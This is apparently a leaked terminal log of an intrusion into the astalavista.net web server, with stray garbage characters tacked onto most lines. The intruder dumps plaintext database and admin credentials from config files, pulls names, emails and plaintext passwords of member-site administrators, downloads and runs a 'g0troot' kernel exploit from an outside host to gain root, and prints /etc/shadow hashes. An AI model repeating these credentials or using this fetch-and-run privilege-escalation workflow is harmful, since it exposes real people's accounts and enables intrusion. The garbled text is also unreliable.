3 n5 T' o: t, u8 H. ^0 y! ]drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
; g5 I, [* v% t- h4 Z. r( ^# {/ p-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
0 B) Z: r0 }, tdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config, [: v! i7 \" P: W- ^* B! p
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron% Y w: M0 t, f' r8 c. [+ B
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd1 D+ i- U9 A F/ S
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
3 N. T9 `' r. Y% x-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
+ ?' ~5 _4 N: c3 @1 ]drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed Y1 q+ C- v: N/ t d
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour( O1 y( @% ]3 n. F7 z9 \4 [; ?
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess. B, l- h1 |$ l7 A( e
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
# H! t$ o! K# x5 l5 i$ l-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
, ]: F, |3 c1 D7 U4 q' P& ?-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html7 ]& T% Q2 d( U3 N- p9 j! W
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
$ V5 l T- `" j6 V-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php; O8 j! E" }3 S
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
1 F: ^' T% B! y# v- W+ l bdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
) \; x9 e- l: Q* ~drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang+ e; e8 P1 D* z) U3 [
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
m! F3 x0 s- s9 X* Q5 tdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
" V/ Q4 N9 A9 Hdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member* S# j0 _* `. \ Y: E( l' b |
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
0 G/ ~5 x! q1 V7 T) H$ edrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
8 l2 L; z: L4 S5 F- W, t/ W-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf; ?4 ~% S6 G& w& n
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re) ^9 X: }' M5 N' P2 [4 W( U
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt; | |- T3 ~4 ]8 X. [
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
4 J. `8 K5 E' ?3 T9 ~drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
' r- x% i( K$ o9 o& p' Ddrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
0 R. R. T _4 G; E/ vdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
. W8 m5 L' G6 }6 | {$ U$ s3 |drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src/ k& N0 l1 c; G3 T6 X+ K2 b7 f
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
! {6 r! J a% Gdrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2' h6 [8 k* |4 S2 p0 [4 f
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old2 z' I0 N, B) R b) o
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php/ G" K2 Y W, s# }6 |
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki1 \2 g7 n$ j! y; Q
$ ]9 O3 x& o; ?* C1 G( r/ u' `
sh-3.2$ head -20 index.php, I) l8 l9 U2 Q" e: H3 k
<?PHP2 M, o% P9 @9 E
/**
2 p7 y2 |4 M: n& t; m. ^" \* Mainfile (external) for astalavistaNET v2.0
$ M2 f; c: o+ e% P*+ O- y9 G1 T7 p$ C, _
* @copyright Astalavista IT Engineering GmbH* k' v- b& S/ a& K
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>! |8 u* Q e. Q5 [
* @version 1.0
! w4 [; a; {. \$ o0 h! {*/* v9 c5 t1 M( k+ n
% y* H8 A# Q M S- t& I8 U
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
& P/ m) r; }4 |* U' ] $dontStartSession = false;
0 _$ Q& S8 Q/ T$ N% @/ i( Y } else {2 q" N- K0 F. ]. |1 d; O' n
$dontStartSession = true;8 Z0 Z% U3 W( |( {, A
}$ ?$ d2 C; r- ?- \) H. ^. U
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’); K4 c# Z6 Y7 i( ~/ G, ]
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);6 o7 u; Q B; y: O# L+ @! S4 Q. n
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);4 J: [6 u7 q7 t$ A+ b2 u/ X. [
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);. X- O" U+ W2 }
) a5 m1 z% U) X) ~0 g/ S! x
sh-3.2$ cd config7 B" T( @+ S+ f, D
sh-3.2$ ls -la0 E% y7 [) l7 H0 D/ e
total 325 t3 b. n9 i+ V$ ~+ x1 d
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
$ _/ d( E2 y) q* A8 `' k9 `drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
# ?, p- D8 |1 U& n6 E-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
; ^3 a4 P1 w+ ^; k5 I5 T! Z-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php s9 ~/ g! v, \0 _' V2 W" t! m- A
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php0 P9 j3 f% [9 s9 F
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php) R- M" U, l( n. A8 c/ }
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php4 i& u( A1 e6 W u
& C; p/ C. g u8 `1 D
sh-3.2$ cat com.conf.php
* p: K" ?; |+ c- U: }* h( {' c[snip]- v, O- O% m* i) o" q( x
//member-database2 i8 p$ D0 d; s3 e1 E# g& Q3 |! X
$_CONFIG['db_mem_server'] = ‘localhost’;% y" W" I, L& X
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
( A( H+ z, y) u3 [9 V$ J$_CONFIG['db_mem_user'] = ‘astanet_db’;
( {3 N4 G' j% c. \" X4 ]/ y7 x8 f7 p$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
1 I+ w* }6 c, F4 Q) B I$_CONFIG['db_mem_debug'] = false; //true or false. b5 H. t6 B. g" @
//ads-database" ]) U$ b$ _4 Z, g1 ~5 r
$_CONFIG['db_ads_server'] = ‘localhost’;, I: J* O0 }# o% L7 p3 z
$_CONFIG['db_ads_database'] = ‘astanet_ads’;5 B, H/ V$ r7 t l3 ]! g7 Z
$_CONFIG['db_ads_user'] = ‘astanet_db’;" v) k/ {9 T w: H
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’; v; l2 m0 K) P% g3 ~, P/ Z
$_CONFIG['db_ads_debug'] = false; //true or false
- Y& w' M0 @1 M1 s5 Z5 P//rainbow-database+ l' S5 S, R/ W7 S. u* z9 Z! W# }
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
5 z' d H& X3 |2 p* J0 x$_CONFIG['db_rainbow_database'] = ‘rainbow’;" |! Q) h. _+ w
$_CONFIG['db_rainbow_user'] = ‘dinu’;& J1 H! [" `+ i: e- N s4 ~
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;5 ?( R1 b- Z- Y% O, N
$_CONFIG['db_rainbow_debug'] = false; //true or false
7 q1 I6 D0 l& }9 ^( ~//mailing lists database
/ k1 J+ ?* p6 X$_CONFIG['db_mailing_lists_server'] = ‘localhost’;9 I$ K% Z* z, ~: [) z7 `
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
" R; T9 \' l5 n2 X1 l$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
; x5 d, g* I7 n& d, a+ C. k$ O$ e$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;6 Q3 S( V, N+ v" F$ x& f: p
$_CONFIG['db_mailing_lists_debug'] = false; //true or false8 e1 }: f- `- h
//paypal5 U2 ]- ~) d; V; `6 X1 T
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
* O/ r# b1 X1 @$_CONFIG['sub_pp_cmd'] = ‘_xclick’;' ]: u9 f* F& K1 c. r% k( z
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
$ C" J) I) W3 r2 _$ l' u* i$_CONFIG['sub_pp_noship'] = ‘1′;
' a$ o8 |; n/ k! j) A$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;& V h# | }; P' J6 B" h
[snip]
7 p) Y4 |% e3 ?6 q3 q' ]
: ?' e, V: a; |sh-3.2$ cd ..
, f+ `4 S8 s8 W0 P! Fsh-3.2$ cd member! m' v3 ^5 d) D/ R, v
sh-3.2$ ls -la+ J% o3 `2 n3 t& g& I+ j% a
total 209 R# e9 P4 z* L7 G
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
% i% @- a q* V! G: B) _drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
9 x3 Z, R, z8 O5 {( B-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess: I' x$ c4 e0 C1 _+ G, v
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
% U. M) X6 L7 w; |( |: `9 ]/ Ysh-3.2$ cat .htaccess: K, ]# ~2 N% Y* z
SecFilterEngine off, b4 e$ N+ ^3 _. k8 X3 H
1 w) H6 t' T% Rsh-3.2$ cd ..6 ^0 ^- D* Y7 Q( q& u+ D7 z4 P4 Y
sh-3.2$ cd cron) E3 z% v' x2 l/ Y- {) ^
sh-3.2$ ls -la, _1 z) y+ A& _/ \1 Q( Y$ a
total 168! G3 r) d/ V* _6 S; p
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
8 a: p, A( V: {( b( ndrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, }3 G4 ` |; a$ Z3 n1 |/ p! u' G-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php) c" t0 O3 w: _% ?$ Y
-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
' G& J/ C0 J4 w! ^1 b( P-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
6 y3 \+ r4 Q5 J-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
1 m5 F7 a+ S3 _+ S-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
) {) ^7 m' u1 L) ?-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
, S$ c: W! E# z, P-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php" [" Q% p* B6 N% G3 o- m- u: k
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
* G5 n) `5 g( E6 p-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
8 a+ Q5 B; c0 S; l9 [ p-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php0 e6 j |4 G0 P; ~1 i
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php. V# V0 s3 z5 Z# O \2 w
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php* S9 d: u' A$ Z f N. d
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh9 g% v9 o$ U P% u
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
# r- U' R4 P- R$ v6 |; o t! R-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php7 v; D5 m" n; Y& S- w. _& O) @4 F
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php2 |1 }% f4 o3 b
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
& X# q( q8 J* X4 r1 G5 W# T5 [/ I-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php7 e/ @# K' T, e
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
5 | k3 l% D* \) S& D-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php, @( m! a g6 S/ S
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php: A1 }$ _+ R7 v! Z% `% d
7 a' ~0 o2 Z- y5 _6 Fsh-3.2$ cd ..
7 t% G+ i7 l3 e" M2 x9 Jsh-3.2$ cd _007* N [# d' p! q3 W$ X [+ v
sh-3.2$ ls -la N$ ?& i( X# f! [$ N
total 24: a, a2 N& t4 `1 J9 O5 a5 X# Z
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 ., c; X7 ?: {1 F
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
% p& m2 J- G; l$ R* \3 S-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess2 W9 z* J+ D/ |( m. i6 y) \# u* r
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php/ R: C& P$ ?. o! p1 h
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php! F0 w% l: }2 r t
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap. X/ Q0 Q! X+ d, `. c8 C/ J
( Z$ f" O! ~5 Ush-3.2$ cat .htaccess
7 G$ N8 W' G" t; DauthType Basic
: u1 M; G$ c% u$ WauthName Admin" W$ @4 L" h4 {& @3 G
authUserFile /home/astanet/auth/.htadm_pwd
! P" Y, N. O+ [5 \$ Xrequire valid-user
* ~, s8 _2 \" ~( Y" N* v
$ F3 p2 m6 C# V% ^- Z, N& l9 |sh-3.2$ cat /home/astanet/auth/.htadm_pwd% |+ e& x3 W2 ~( w: n+ {2 w9 k. k
admin2net:CR0bl65MwhfT
5 v) \7 F; w( b1 w) g3 o- G, I# ?' S$ h/ m/ m+ S( R; D9 B
sh-3.2$ mysql -u astanet_db -p! B& f. d1 E6 _
Enter password:
0 Y3 b; c& ?7 k3 `3 UWelcome to the MySQL monitor. Commands end with ; or \g.
$ L2 r9 N/ i+ W0 G8 U" `Your MySQL connection id is 275153! J8 g2 z( x O
Server version: 5.0.45-community-log MySQL Community Edition (GPL)3 Y2 Z/ B1 V/ e
# d; q6 r& P1 m" W% EType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* v7 |1 v. x& h! t
/ I& r/ W9 a$ s0 W+ V j9 b
mysql> show databases;# k7 s. M! c1 U. f2 q0 _
+———————–+
9 ^' {, S% {0 [( r+ y3 v| Database |
* _) [7 \7 L1 e8 Z6 Y# F+———————–+
7 e, }! p) ]7 Q* V| information_schema |% e6 _7 r' m7 l ~9 k- X
| astanet_ads |
+ M' ^( H; R- N8 m* y* X. m| astanet_mailing_lists |
' v* _8 W0 a, K4 M" M9 u; _, z| astanet_mediawiki |6 S' y F+ A9 \4 y. D0 I7 P
| astanet_membersystem |
8 {$ |+ l$ W$ \% C| test |
# y; [$ _4 Q9 A+———————–+, s3 }* G0 h0 \; W, I
6 rows in set (0.00 sec)
. _- r) z2 q1 t) k) k" Z
" l x$ [" s4 [% z. dmysql> use astanet_membersystem+ G3 ]# Y+ W: @/ y+ m
Database changed
2 Q F7 h0 n" F/ d0 a& `% Jmysql> show tables;
C7 h+ J/ f7 r2 ~) g( N7 ?% `+———————————–+/ _. [# [. F( M7 y# O
| Tables_in_astanet_membersystem |% S" F# Q H, u4 ?" v$ F
+———————————–+
3 e4 s: t4 ~) o4 Z/ p2 N| blacklist_categories |
5 W3 J6 o1 S; ^' d; r5 y2 Y; c| blacklist_content |
# \1 c2 [% x9 d7 C# || blacklist_levels |* H/ L9 P g: n h3 H) p
| blacklist_mcset |
* u+ R* R' \) q% H+ S# j| dir_categories |8 v) D2 b! O, l/ R+ F9 }3 o
| dir_comments |
8 D0 O: ]6 N4 T5 f5 I/ \/ g| dir_links |
4 j" P( P# U$ `( ^) @. j% H# O+ y| dir_temp |
1 b# a6 S# n2 _) h" o| dir_votes |
r1 Y0 r' W( A" t6 x! D6 u| documents |9 @8 b" q6 y, T- d) n
| documents_categories |/ E: e, X5 Z ~ q% V7 A& Z9 U
| email_content |! ]) `8 I, |2 |# z3 Y1 g+ |* @
| email_settings | E. }6 O }8 E1 ^5 R
| exploits |2 V$ ^, E1 H) y( L9 K
| exploits_categories |# U( `6 T' g/ j
| exploittree_categories |5 E8 d2 D& Y1 c1 _, u) ] s
| exploittree_exploits |
% @5 Y1 Z7 v; j- M' K' l0 x: s- ^| home_values |
% l0 u) h9 d8 Q& M6 _2 \8 G| iso_countries |0 B1 C! E( r, o9 ^6 K
| links_categories |3 y2 G- O% p$ s
| links_records |/ t* B+ {+ L% K% w' X& b
| links_unauth |
, J! F1 w8 u' h5 B| links_votes |: `: y9 a R8 R( Z& Q' R' U+ H
| log |+ [0 b1 U3 `, u0 [1 C
| news_categories |
8 ?/ x- t# E% o i, u( `6 H| news_comments |6 p" e" e8 d* w0 {7 `( M! S
| news_emoticons |
# \) X! b* B2 P| news_latest | K0 C1 |3 ~/ k7 w( q# e
| news_messages |( H9 E0 Y& Y% j4 z. p
| news_statistics |4 s7 d1 r) V- r& v
| news_votes |' f4 s/ }/ T: x4 P7 Z5 D
| prices_content |
' W2 G; t' E4 s5 I. e& i& G| prices_offers |2 b6 A2 I3 v: K% l
| rss_settings |8 q; D/ Y2 j6 r: W0 t# Q+ D9 c
| sessions |/ B* a! W3 U2 e( g9 V; _# ?5 y
| stats_signups |2 R6 u C/ w0 F5 B* f ~! A7 g7 C9 S
| u2u2 |
8 l. B; {) \9 J: K) Q9 k| u2u_contact |% o( |" g P: b
| u2u_settings |% ]# v: j$ H2 c# `! s6 S! e
| user_keywords_selected_categories |
; { i' e. S4 K1 ^| users |
' ]% Z3 p& N8 P! e# ]6 q# k" v| users_ipn_test |
; l5 X% x3 P$ P8 z* e| users_keyword_values |7 p3 Y8 l+ g r4 S- R
| users_profile |7 w; k$ a+ @- O+ _8 p' q6 c
| users_temp |
+ X9 f/ V2 p& [5 }$ M4 j8 }5 S| users_upgrade |6 g W: F, q, t n8 B; p, c
+———————————–+
2 u) | g) Z" n. _( y0 C) I. G46 rows in set (0.00 sec)0 D4 {# h J, `. u$ U% p6 ]
- ?0 m3 l: e- J
mysql> describe users;
% L5 G$ V4 j$ \# p) C4 Y+————————–+————————————–+——+—–+———————+—————-++ u% Q, Q' i- n6 O' B$ w K$ P
| Field | Type | Null | Key | Default | Extra |. Y1 P: M6 c* y
+————————–+————————————–+——+—–+———————+—————-+
: F( d3 R) I5 D$ y| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |+ Q1 ?4 v% v% g, j. v" p9 p8 n
| user | varchar(50) | NO | | | |
: w' ^' q% M! B| nickname | varchar(30) | NO | MUL | anonymous | |- z p3 h. h2 c; y) O
| password | varchar(30) | NO | | | |
) |; ?- S F! s| userlevel | tinyint(3) | YES | MUL | NULL | |
9 z, N8 V9 ]. w" W9 ~$ c| exp | int(8) unsigned | NO | | 0 | |, g! o* q; Y/ n- d& S. n
| email | varchar(50) | NO | | | |0 u$ J9 G" b6 O7 k, o
| ip | varchar(15) | NO | | 0 | |5 ~6 d+ e" v. e& K T5 o/ Q
| proxy | set(’0′,’1′) | NO | | 0 | | B2 M/ j1 j ], p- |/ u' r7 n) r
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
. U7 ` o9 f5 m8 h" g) D| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
# B1 ?; W- X! v3 R2 w7 h2 C$ n- [| anz_in | tinyint(1) | NO | | -1 | |# |. p) ]4 Z( n
| status | tinyint(1) unsigned | NO | | 0 | |. Q& x& E0 ]/ G' j$ |" m5 ]
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
& ^1 _9 k* p/ p1 D7 O% S| freemember | set(’0′,’1′) | NO | | 0 | |
: d6 Y, B( ]3 k. p* Y# K" @| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |4 B" y) r/ S8 M8 f
| lang | tinytext | NO | | | |% N! @ ]! C+ J
| adid | smallint(6) | NO | | 0 | |) F) B0 r. V) w( H' S2 N! J
| pp_txn_id | varchar(255) | YES | | NULL | |/ B& k A: K! y' u7 p7 ~3 w
| cnb_transaction_id | varchar(255) | YES | | NULL | |
8 |3 |+ t5 k2 x| cnb_order_id | varchar(255) | YES | | NULL | |
+ `+ O0 x* Z0 }1 G| cnb_user_id | int(11) | YES | | 0 | |) j! U5 ^. @: }6 R' H
+————————–+————————————–+——+—–+———————+—————-+' q6 V6 l4 |( L6 ^0 g* l6 Z
22 rows in set (0.01 sec)! P/ I; l" E, s9 U% Q
; j& d( L) a2 u4 ymysql> select count(*) as skids from users;
% R1 H) I+ v& V+——-+* A. j; c& t4 q) W! B, S
| skids |: e7 @4 f- v5 C5 C
+——-+
" \; l+ ?/ Q$ t. {0 g) S* b4 {9 y% x. C| 25199 |
) {# Y i( V0 x3 b/ S+——-+
% b1 d; u) V7 G& \8 k1 row in set (0.00 sec)
/ @ p& r& w, ^8 n7 _, V8 B9 n0 j: ^% ~" J' V: B$ a3 x: F
mysql> select user,nickname,password,email from users where userlevel = 1;
% c& W) h3 e% X$ v' }+————————–+———————-+——————+———————————–+
' N% S7 H2 O! e# _1 m! g. N| user | nickname | password | email |& L( [2 C; q9 m$ C P+ B' t
+————————–+———————-+——————+———————————–+
6 H+ }" L/ ?! a; o3 Z5 f| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
, f: }% W" \8 ?( Q| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
* X) r9 j \3 c+ W$ b0 f| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
" H8 _4 {; @5 _: w4 K3 r. i| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |1 S; Q5 i9 c2 y7 t6 z/ l6 V
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
0 S( E+ o& t% \! X) _" v| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
( J1 u/ X5 {3 Z2 J| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |1 K: G, H+ G8 e5 \" L3 ~0 _
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |; u3 E# u7 x5 j# }4 Z
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |+ `# R5 |( e2 d( ~9 I0 V
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |% a v0 b& ?) \
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |( N. j* m k! b l
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
$ b3 _' j6 t' L0 S" y: U| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |5 \, p g' r1 S* v3 k
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
, c$ Y: J2 {1 t m; S. g! ~| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
. k# W' S$ [$ x8 Z& [: V3 o5 F+ f| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
6 d4 E$ ~9 n; N0 P+ o| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
5 p i. U3 E3 N3 y1 T3 O| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |+ F% g2 D g# k2 A" \- u
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |: [: ^: p! X8 o2 M; p. W" Q
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
% Q# g) v2 [5 u# {$ x. H| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |1 F' C% |; \ h# t" S1 H
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
& o5 z9 q' d1 Y# g g| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |, X1 u7 u: k4 q- u( {
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |% g3 R$ h/ U! ~; u- L0 |
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
( k: d4 K" {- \6 k) Q. Z| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
; e) O1 x7 L8 K; G| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
7 q% I! Z; y" _4 Q9 R) h+————————–+———————-+——————+———————————–+2 Y& S- n9 W) K J t
27 rows in set (0.00 sec)
- o$ e% v6 i- l, l7 `( [5 k7 J4 R3 ^- k3 I
mysql> exit;# _1 D9 O7 M h: j+ v8 V1 u1 z
Bye* d5 M9 ]- [8 W I8 o T- r+ z
- b) G+ m8 k/ r! z* y
[~] plaintext passwords? yes,
3 |9 c9 B6 {1 G$ g ~5 A7 GThose so called “security professionals” who charge you $6.66 / month to
+ {0 r2 T. R$ _5 Q; Xregister at their hack-proof portal, save your passwords in plaintext…% c9 }( ~% N6 n' D
brilliant!
6 l; Z& ]4 }4 o. N% c
: w6 e# i$ S( [. {$ P[~] This been fun but we want more." k# B$ M$ }+ @9 E6 U
/ U+ M+ ~8 | z/ b/ s. j
sh-3.2$ uname -a0 A( q4 r" C; ~2 B$ d1 ^
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
! Q( j! P& R; Osh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
' b# p% A4 a$ S' c1 a–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
3 [$ h; e* d3 I1 A* bResolving anti.sec.labs… 13.33.33.37. I* l- C* h! A5 W, y* v& Y
Connecting to anti.sec.labs|13.33.33.37|:80… connected.% |" L3 W& ~0 W# W( s. s" Q
HTTP request sent, awaiting response… 200 OK
1 {2 n+ q: _0 a- y% n4 qLength: 18200 (18K) [text/plain]
8 E* V; a0 S" A0 r/ VSaving to: `g0troot’
/ t8 |% E' U& N; v; ^ ~* v! L$ C' d" A8 }# `9 k, c' M
100%[=========================================================================================================================================>] 18,200 58.6K/s in
6 H$ Y3 D: U/ Q6 R1 _2 ~0.3s
! E% T* h* e/ g, N& e b A$ F3 U: @6 C1 T7 @! F/ m
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
4 `. F, O1 F1 K4 ^/ ?' S+ u- `, F0 y& A/ b" I0 k" D4 f( _5 D
sh-3.2$ ./g0troot -i x86_64' P9 p, u) A% O- b1 v+ D3 R
[+] g0troot - anti.sec.labs# R4 C8 k% ^' d& G
[+] Target: 2.6.18-128.1.10.el5* }( h7 ^+ k3 g( J
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
5 R3 Q" z( U. D, B5 [. n1 q) G
2 u/ s& i( C# T, j' y1 Y$ b[+] r00tr00t
4 X7 B/ T! K3 ~, L6 G[~] Executing shell…, W( r) ?3 R& K8 v3 c
: }, X& w2 V1 Lsh-3.2# id
+ U- g# y8 j8 M; y6 c+ H8 z3 l5 ^uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
" G& Q' a1 h, \ U) v% h; L4 d& \! ~' A+ e/ V
sh-3.2# cat /etc/shadow# Y+ @4 S5 U, v8 t: e
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::) m3 Q* r+ U. N B; V
[snip]( C- R" X* F, m" s0 C" I( N+ @
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
T! z5 d# A6 X# h/ k4 Y* vjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
5 J- c% u+ x3 k- y5 Dcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7::: r( @ T' V c0 Z' y* h
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
0 M! {* |1 T9 v, \3 v( Q( l2 X5 V2 \
sh-3.2# cat /etc/motd3 [; G& Z' j( x5 S* J( p! [& I
###################################################### ^# r( R( w. ?( |
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
2 K7 n) R; b6 x$ v) q- s9 I5 o# |__| [__ | |__| | |__| | | | [__ | |__| #2 h( S: }/ M! {, p W: C* E$ z
# | | ___] | | | |___ | | \/ | ___] | | | #' o% @/ D! J1 w% R% w
# #
